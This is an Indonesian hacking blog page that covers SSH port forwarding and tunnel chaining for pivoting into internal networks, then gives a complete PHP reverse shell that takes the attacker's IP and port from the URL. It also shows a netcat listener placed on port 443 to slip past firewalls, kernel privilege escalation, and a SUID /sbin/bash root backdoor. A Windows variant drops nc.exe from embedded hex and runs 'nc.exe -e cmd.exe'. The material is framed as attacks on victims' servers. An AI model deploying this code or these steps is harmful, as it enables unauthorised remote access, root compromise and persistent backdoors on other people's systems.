Sedangkan pada dynamic (local) port  forwarding, kita tidak perlu menentukan pemetaan port asal dan IP:tujuan untuk setiap tujuan. Kita hanya perlu menentukan port berapa yang akan LISTEN di localhost (di komputer ssh client), dan semua aplikasi bisa memanfaatkan port tersebut sebagai proxy ke tujuan manapun dengan protokol SOCKS (SOCKS proxy). Berbeda dengan gambar sebelumnya, pada dynamic port forwarding di sisi ssh client hanya ada satu port yang LISTEN (hanya ada satu bulatan merah).
Multiple Port Forwarding on Single SSH Connection
Walaupun jarang dipakai, namun sebenarnya ssh mendukung banyak port forwarding dalam satu koneksi ssh. Kalau kita membutuhkan 3 local port forwarding dan 4 remote port forwarding, kita tidak perlu membuat 7 koneksi ssh, cukup satu koneksi ssh saja.
multi port forwarding on a single ssh connection
Gambar di atas memperlihatkan ilustrasi multi port forwarding pada satu koneksi ssh yang sama. Dalam satu koneksi ssh tersebut port forwarding yang dibuat adalah:
  • Panah berwarna hitam paling atas adalah local port forwarding.
  • Panah berwarna biru dan biru gelap di tengah adalah dynamic port forwarding.
  • Panah berwarna hijau paling bawah adalah remote port forwarding.
Daripada membuat 3 koneksi ssh untuk masing-masing port forwarding, jauh lebih sederhana dan praktis membuat multi port forwarding pada satu koneksi ssh.
Membuat Local Port Forwarding
Sekarang setelah memahami konseptualnya, kita langsung praktek bagaimana membuat ssh tunnel dengan putty di Windows dan command line ssh di Linux.Command untuk membuat local port forwarding secara umum adalah:
ssh -L localport:servertujuan:porttujuan user@ssh_server
Contohnya adalah:
ssh -L 8888:www.kompas.com:80 admin@serverku.com
Perintah di atas akan membuat semua koneksi ke port 8888 di localhost, dialihkan ke www.kompas.com port 80 melalui serverku.com. Titik masuknya adalah localhost:8888 dan titik keluarnya adalah serverku.com. Bila kita membuka browser ke URL http://localhost:8888, request HTTP tersebut akan sampai di www.kompas.com:80 melalui serverku.com, artinya dari sudut pandang www.kompas.com koneksi berasal dari serverku.com, bukan dari komputer yang menjalankan perintah tersebut. Dalam log web server www.kompas.com, IP address visitor adalah ip address serverku.com, bukan ip address komputer yang menjalankan perintah tersebut.
Kalau dalam windows, kita bisa gunakan putty.exe untuk membuat local port forwarding tunnel. Gambar di bawah ini adalah setting untuk forward koneksi localhost:8888 ke www.kompas.com:80. Caranya adalah dengan memasukkan 8888 ke dalam field “Source port”, dan memasukkan www.kompas.com:80 ke dalam field “Destination”. Setelah itu klik “Add”. Anda bisa menambahkan port forwarding yang lain sebanyak yang anda butuhkan dengan mengulang cara yang sama lalu klik “Add” lagi.

Membuat Remote Port Forwarding
Command untuk membuat remote port forwarding di Linux secara umum adalah:
ssh -R remoteport:servertujuan:porttujuan user@ssh_server
Contohnya adalah:
ssh -R 8080:192.168.1.1:80 admin@serverku.com
Perintah di atas akan membuat setiap koneksi ke serverku.com:8080 akan dialihkan ke 192.168.1.1 melalui komputer yang menjalankan perintah tersebut. Pada log server tujuan (192.168.1.1:80) yang terlihat dari koneksi yang masuk bukan ip address serverku.com. Server 192.168.1.1:80 akan melihat koneksi berasal dari komputer yang menjalankan perintah di tersebut (komputer ssh client).
Kalau dengan putty caranya masukkan 9999 ke dalam kolom “Source port”, kemudian masukkan 192.168.1.1:80 sebagai kolom “Destination”, lalu klik Add. Anda bisa menambahkan banyak port forwarding dalam satu koneksi ssh, dengan cara yang sama, lalu klik Add sebanyak yang anda butuhkan.

Remote port forwarding ini sangat cocok dipakai sebagai backdoor. Bila seorang hacker telah berhasil menyusup hingga “behind enemy lines”, dia bisa membuat remote port forwarding tunnel dari “behind enemy lines” ke server di luar milik hacker. Ini artinya hacker telah membuat terowongan, dengan pintu masuk di luar, dan pintu keluar di “behind enemy lines”. Ingat pada Remote port forwarding, titik/pintu masuk adalah di sisi ssh server, dan titik/pintu keluar di ssh sisi client. Dengan memakai terowongan ini, hacker bisa masuk melalui pintu di servernya sendiri yang berada di luar, dan secara otomatis hacker tersebut masuk ke “behind enemy lines” karena pintu keluar dari terowongan ini ada di “behind enemy lines”.
Chaining Tunnel
Terkadang ketika melakukan penetrasi, di dunia nyata keadaan tidaklah semulus dan seindah teori atau dalam lab. Firewall seringkali membuat kita tidak bisa bebas membuat koneksi ke server yang kita inginkan. Dalam situasi seperti ini kita harus berputar-putar melalu beberapa server, sampai kita bisa mencapai server target.
Perhatikan gambar di atas, target yang akan diserang hacker adalah server D.D.D.D port 3389, yaitu Remote Desktop connection, hacker ingin melakukan remote desktop komputer tersebut. Namun server D hanya bisa diakses oleh server C, dan server C hanya bisa diakses dari A. Hacker sudah menguasai penuh server A dan C, bagaimana caranya hacker tersebut bisa remote desktop ke D ?
Tujuan akhirnya adalah hacker ingin koneksi ke localhost:9999 di laptop backtracknya, akan diforward ke D.D.D.D:3389. Jadi nanti dia tinggal menjalankan RDP client dengan memasukkan localhost:9999, dan dia otomatis akan terkoneksi ke RDP di server D. Sebagai info tambahan, komputer A dan C adalah linux dengan ssh service diaktifkan.
Mari kita coba membuat semua tunnel ini purely hanya dengan ssh.
1. Buat port forwarding localhost:9999 –> C.C.C.C:8888 via A.A.A.A.
Hacker menjalankan ssh client di backtracknya untuk membuat koneksi ke ssh server A.A.A.A. Dalam koneksi ssh ini, dia membuat local port forwarding 9999:C.C.C.C:8888, yang artinya adalah koneksi ke port 9999 di backtrack si hacker akan diforward ke C.C.C.C:8888 via A.A.A.A.
2. Buat port forwarding C.C.C.C:8888 –> D.D.D.D:3389 via C.C.C.C
Di komputer C, hacker membuat koneksi ssh ke localhost (ke C itu sendiri). Dalam koneksi ssh ke diri sendiri ini dia membuat local port forwarding 8888:D.D.D.D:3389. Artinya adalah koneksi ke C.C.C.C:8888 akan diforward ke D.D.D.D:3389 (via C.C.C.C itu sendiri).
Kita membuat 2 tunnel, yang pertama adalah tunnel dengan pintu masuk di backtrack hacker dan pintu keluar di A.A.A.A. Tunnel kedua adalah denngan pintu masuk dan pintu keluar di C juga.
Pada tunnel pertama, koneksi ke pintu masuk di backtrack hacker (localhost:9999), akan diforward ke C.C.C.C:8888 via A.A.A.A Sedangkan pada server C.C.C.C sudah dibuat port forwarding sehingga semua koneksi yang masuk ke C.C.C.C:8888 akan diforward menuju D.D.D.D:3389.
Jadi akhirnya nanti alurnya adalah:
localhost:9999 –> C.C.C.C:8888 –> D.D.D.D:3389

Gambar di atas menunjukkan chain tunnel yang dibuat. Koneksi ke localhost:9999 akan diteruskan ke C.C.C.C:888 dan koneksi ke C.C.C.C:8888 akan diteruskan ke D.D.D.D:3389. Jadi sama artinya dengan koneksi ke localhost:9999 diteruskan ke D.D.D.D:3389.


Reverse Connecting Shell di PHP

Rootshell adalah impian semua hacker. Biasanya seorang hacker yang masuk melalui web vulnerability, akan mengupload webshell. Dengan webshell si hacker bisa mengeksekusi command shell melalui request HTTP. Namun webshell tetaplah bukan true shell, webshell memiliki banyak keterbatasan, salah satunya adalah sifatnya yang tidak interaktif.
Dalam artikel ini saya akan menjelaskan bagaimana caranya mendapatkan true shell yang interaktif dari suatu website yang berhasil dihack. Dari shell tersebut saya juga memperlihatkan contoh eksploitasi lokal untuk meningkatkan privilege dari user biasa (apache) menjadi root dan mensetup sebuah backdoor sehingga si hacker kapan saja bisa mendapatkan rootshell.

Reverse Shell PHP di Linux
Saya memakai reverse shell php dari situs pentestmonkey.net dalam artikel ini. Reverse shell tersebut dibuat murni dalam PHP namun hanya bekerja untuk OS berbasis UNIX seperti Linux. Saya sudah mencoba untuk memodifikasi reverse shell tersebut untuk bekerja di windows, namun belum berhasil, jadi untuk Windows saya akan pakai pendekatan lain yang tidak murni PHP.
Reverse shell tersebut memiliki dua konfigurasi yang dihard-coded ke dalam file phpnya, yaitu IP address dan port server yang akan dihubungi oleh reverse shell ini. Agar lebih fleksibel saya mengubah dua variabel tersebut menjadi mengambil nilai dari parameter GET.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
Ubah dua baris yang mengandung variabel $ip dan $port menjadi seperti di bawah ini.
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET["ip"];
$port = $_GET["port"];
$chunk_size = 1400;
Jadi source code lengkap rs.php adalah sebagai berikut:
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET["ip"]; 
$port = $_GET["port"]; 
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/bash -p -i';
$daemon = 0;
$debug = 0;
 
if (function_exists('pcntl_fork')) {
 // Fork and have the parent process exit
 $pid = pcntl_fork();
 
 if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
 }
 
 if ($pid) {
  exit(0);  // Parent exits
 }
 
 // Make the current process a session leader
 // Will only succeed if we forked
 if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
 }
 
 $daemon = 1;
} else {
 printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
 
// Change to a safe directory
chdir("/");
 
// Remove any umask we inherited
umask(0);
 
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
 printit("$errstr ($errno)");
 exit(1);
}
 
// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
 
$process = proc_open($shell, $descriptorspec, $pipes);
 
if (!is_resource($process)) {
 printit("ERROR: Can't spawn shell");
 exit(1);
}
 
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
 
printit("Successfully opened reverse shell to $ip:$port");
 
while (1) {
 // Check for end of TCP connection
 if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
 }
 
 // Check for end of STDOUT
 if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
 }
 
 // Wait until a command is end down $sock, or some
 // command output is available on STDOUT or STDERR
 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 
 // If we can read from the TCP socket, send
 // data to process's STDIN
 if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
 }
 
 // If we can read from the process's STDOUT
 // send data down tcp connection
 if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
 }
 
 // If we can read from the process's STDERR
 // send data down tcp connection
 if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
 }
}
 
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
 
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}
?>
Setelah file tersebut dibuat, cara memakainya sangat mudah, anda hanya perlu memasukkan file tersebut ke suatu website. Lalu request file PHP tersebut dari browser anda. Contohnya bila anda menamakan file tersebut dengan rs.php, maka anda cukup membuka browser ke URL http://ALAMAT.IP.KORBAN/rs.php?ip=ALAMAT.IP.HACKER&port=NO.PORT.HACKER
Tapi sebelumnya anda harus sudah menyiapkan “listener”-nya di server milik hacker. Cara termudah adalah dengan memakai program netcat. Netcat di linux sudah secara default tersedia, sedangkan untuk windows harus didownload dulu dari sini.
Dua gambar di bawah ini menunjukkan kondisi ketika ketika rs.php di-request, seketika itu juga netcat yang sudah diset untuk listen di port 443 menerima koneksi dari server korban dan memberikan shell untuk anda. Saya memilih port 443 karena biasanya firewall mengizinkan koneksi outbound pada port http dan https, bila saya memilih port 4444 dikhawatirkan firewall di server korban akan memblok koneksi tersebut karena port yang tidak umum.


Bila anda hosting di tempat yang tidak memberikan akses ssh, jangan kuatir, dengan cara ini anda bisa mendapatkan shell interaktif layaknya memakai ssh. Pengelola hosting juga jangan merasa aman bila tidak menyediakan akses ssh bagi customernya karena dengan cara ini customer bisa mendapatkan akses shell seperti ssh dan melakukan eksploitasi lokal lebih leluasa.
Privilege Escalation
Mari kita lanjutkan skenarionya. Setelah kita mendapatkan akses shell sebagai user apache (ceritanya kita berhasil menghack website korban melalui sql injection attack). Kenapa user apache? Karena webservernya kebetulan dijalankan dengan privilege user apache.
Perintah uname memperlihatkan bahwa server hosting tersebut memakai Linux dengan kernel yang vulnerable terhadap null pointer dereference. Itu artinya kita bisa menjadi root di server hosting tersebut. Gambar di bawah ini adalah langkah yang dilakukan hacker untuk menjadi root.

Reverse Rootshell
Setelah menjadi root dengan mengeksploitasi kernel, hacker berusaha memasang backdoor sehingga dia bisa mendapatkan rootshell kapan saja dia mau. Dia akan membuat salinan /bin/bash ke dalam /sbin/bash, kemudian mengubah permissionnya menjadi SUID root (4755). Dengan cara ini, siapapun yang mengeksekusi /sbin/bash bisa menjadi root (khusus untuk bash perlu ditambahkan opsi -p untuk mendapatkan rootshell).
Setelah membuat /sbin/bash, kini hacker membuat file baru rsroot.php yang merupakan modifikasi dari rs.php. Perbedaan antara rs.php dan rsroot.php hanya pada baris yang berisi variabel $shell. Bila sebelumnya variable $shell berisi /bin/bash, maka kini menjadi /sbin/bash yaitu root shell yang sudah dibuat hacker.

Sekarang backdoor rsroot.php sudah siap dieksekusi. Kapanpun hacker menginginkan rootshell di server korban, dia hanya perlu membuka URL http://ALAMAT.IP.KORBAN/rsroot.php?ip=ALAMAT.IP.HACKER&port=NO.PORT.HACKER.
Gambar di bawah ini menunjukkan perbedaan antara rs.php dan rsroot.php. Ketika hacker mendapatkan rootshell dengan merequest URL rsroot.php terlihat karakter prompt yang didapatkan adalah “#” yang berarti ini adalah rootshell. Namun ketika shell di dapatkan melalui rs.php, maka prompt yang didapatkan adalah “$” yang berarti hanya normal shell sebagai apache.

Reverse Shell di Windows
File rs.php hanya berlaku untuk server berbasis UNIX seperti Linux, file tersebut tidak berlaku bila webserver berjalan di OS Windows. Karena implementasi dalam php murni tidak bisa, jadi saya menyiasati dengan cara script php tersebut mengeksekusi netcat.exe untuk memberikan reverse shell ke server hacker.
Dalam script php, reverse shell yang memanfaatkan netcat.exe bisa dibuat dalam satu baris saja:
<?php
system("nc.exe ".$_GET["ip"]." ".$_GET["port"]." -d -e cmd.exe");
?>
Masalahnya adalah script di atas memanggil netcat (nc.exe) yang umumnya tidak ada di windows. Ada beberapa alternatif cara untuk mendapatkan nc.exe di windows. Alternatifnya adalah:
  • download: file nc.exe didownload dari suatu server. Donwload bisa dengan php atau tftp.exe.
  • upload: dibuat suatu file php untuk melakukan upload file ke webserver.
  • generate: script php akan membuat file nc.exe kemudian mengeksekusinya.
Dari ketiga alternatif tersebut saya memilih opsi terakhir, yaitu generate karena paling praktis, tidak perlu download/upload nc.exe terpisah, cukup satu file php saja. Caranya adalah saya mengubah isi file binary nc.exe menjadi bentuk hexa, kemudian menaruhnya di awal file php sebagai variabel string. Kemudian isi variabel string ini akan diubah menjadi bentuk binary decimal dan ditulis ke dalam file nc.exe.
Potongan script php di bawah ini mengubah variabel string dalam bentuk hexa ($hex) menjadi bentuk karakter ASCII (binary) dengan fungsi chr() dan disimpan dalam variabel $nc. Kemudian variabel $nc ini ditulis ke dalam file nc.exe dengan fungsi file_put_contents(). Setelah file nc.exe berhasil dibuat, maka dilanjutkan dengan mengeksekusi nc.exe dengan fungsi system().
Dalam potongan code ini, isi variabel $hex sengaja tidak ditulis lengkap agar mudah dilihat.
<?
$hex=
"310101010255362c043bdfcc7ca3b2ff01141b89b009b9140100d9086c64".
"2feff743a88d6c11006fe4f692cb6f91739192980f96985c8ebcbd659d0b".
"699d40629b669b4a9cdc9e309c27349c1c112dea77e00102a635002f003f".
"43fccddffd00a44700e047017700974800e0488d00984900e049dffccddf".
"8600994b00e04b73009b4d00e04d74009d4f00cddffccde04f75009f5000".
"e0509100a05100e05176f2cddffc00a15200e0529200a25300e0539300a3".
"0000237521721b243100ba78f6fdfbdd3200970300793300230f7a340024".
"077b9df87cf9df250f7c36005e001e7d3700267e38736cf00a1d1a39fd0f".
"cf97ffbc80300029812d005f001f823d002b8397b7db47d47f070e09030f".
"00947100dfde4c6d9f1136e457001707116500456b253614dd1272090407".
"db6f866d13d454f702790059001907155de1ad6dda550407166900094317".
"cdb1c1ee6f004f480018d65013220477fbb55ba2c71a5d9a001dd65553ad".
"0e1b1ce76191a6fe526bd51e815ccc1f6400440004a2c4a76e660046c321".
"671de75bc78ea222689f083f236a004a4b3460e1246b006f0b9a164cffda".
"efcb000c263b003a4e27272a072860007eca42903a95225c28beb5c7747a".
"005a8c062c7800582c7414ef0c2d630043db2e8e56e828de51af2f620042".
"f23095b81596c54e1407316d8d3dbe3fdfb100322c003c332e003e073413".
"953487748d352a72740ddbb210a054a2684655749b5b30822e3d70a46a4e".
"57616b6e3304ce3f907cce4058dc82db9a947641a80c6e8e0bcd2d144284".
"6fa6c21470652d140c1e4a1471fe36cb663b4737077748388d49394af0e4".
"d91f842d4b34dcf22c70c0b24d367d742b36cb66794f3175503291513396".
"cdb25976523092532e93bff4bf42e085e087e089e08b09e088e08ae08d72".
"66a48c5ba20337919cc056b224e04881da455c00a5c0d0c5852efd1f5253".
"4453d7cf6e066ef8969fa9d33d46fcf5fc8a7e2600633a5c3e5c5265817d";
$nc = "";
for ($i=0;$i<strlen($hex)/2;$i++) {
    $nc.=chr(hexdec($hex[$i*2].$hex[$i*2+1]));
}
file_put_contents("nc.exe",$nc);
system("nc.exe ".$_GET["ip"]." ".$_GET["port"]." -d -e cmd.exe");
?>
Source code lengkap reverse shell php di windows bisa didownload di sini lalu ekstrak dan masukkan ke web server milik korban. Gambar di bawah ini menunjukkan ketika file rswin.php dieksekusi dan memberikan shell cmd.exe kepada server milik hacker yang menjalankan Linux.



 
Copyright 2010 newbie-herbet. All rights reserved.
Themes by Herbet Ginting l Home Recording l Blogger Template